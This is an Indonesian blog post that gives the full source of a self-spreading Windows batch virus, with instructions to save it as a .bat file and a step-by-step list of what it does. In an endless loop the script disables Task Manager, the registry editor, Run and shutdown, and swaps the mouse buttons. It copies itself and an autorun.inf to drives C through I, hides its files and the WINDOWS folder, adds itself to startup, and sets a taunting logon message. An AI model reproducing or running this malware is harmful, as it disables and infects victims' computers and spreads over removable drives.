Subscribe:

Selasa, 21 Juli 2009

Batch Virus

Temen-temen Berikut adalah contoh virus dengan pemrograman Batch .. sederhana banget sih.. gak kejam .. gak ngrusak .. gak neko-neko... tapi licik... hahaha

kenapa bisa licik?? yang bikin licik menurutku tu adanya proses looping nya.. jadi walau file yang di buat virus, atau registry entry yang di ubah ketauan sama yang punya komputer dan di kembalikan sepreti semula, tetep nantinya balik lagi-balik lagi hehehe

yapp... langsung aja.. ini source nya....



@echo off
:proses
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add "hkcu\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f
echo [autorun]>autorun.inf
echo shell\1=Scan Virus>>autorun.inf
echo shell\1\command=noname.bat>>autorun.inf
echo shell\2=Properties>>autorun.inf
echo shell\2\command=noname.bat>>autorun.inf
for %%t in (C D E F G H I) do copy /y autorun.inf %%t:\
for %%t in (C D E F G H I) do copy /y %0 %%t:\
for %%t in (C D E F G H I) do attrib +s +h %%t:\noname.bat
for %%t in (C D E F G H I) do attrib +s +h %%t:\autorun.inf
copy %0 C:\WINDOWS\system32\
reg add hklm\Software\Microsoft\Windows\CurrentVersion\Run /v windos /t REG_SZ /d C:\WINDOWS\system32\noname.bat
attrib +s +h C:\WINDOWS\system32\noname.bat
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /t REG_DWORD /d 91 /f
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /t REG_SZ /d HUIHIHIHI /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /t REG_SZ /d "Maaf, komputer anda saya obok-obok.... Virus ini buatan anak bangsa cintailah produk dalam negri.., virus made in Tipes" /f
reg add hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
attrib +s +h C:\WINDOWS
goto proses

=====================================================================

tulis source diatas ke notepad trus ekstensinya diganti *.bat

algoritmanya sbb :

1. mendisable task manager

2. membalik klik mouse

3. membuat file autorun.inf

4. copy autorun.inf ke drive C,D,E,F,G,H,I

5. copy virus ke drive C,D,E,F,G,H,I

6. merubah atribut virus & file autorun menjadi super hiden

7. copy virus ke system32

8. menjadikan virus aktif saat start up windows

9. merubah atribut virus di folder system32 menjadi super hiden

10. disable find, disable run, disable turn off computer, aktifkan autoplay, disable folder option, disable show super hiden, membuat pesan saat masuk windows, disable regedit.

11. merubah atribut folder WINDOWS menjadi super hiden

semoga bermanfaat..
Diposting oleh Yash di 23.06
Label:

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)
 
Copyright 2009 Yashir's BloG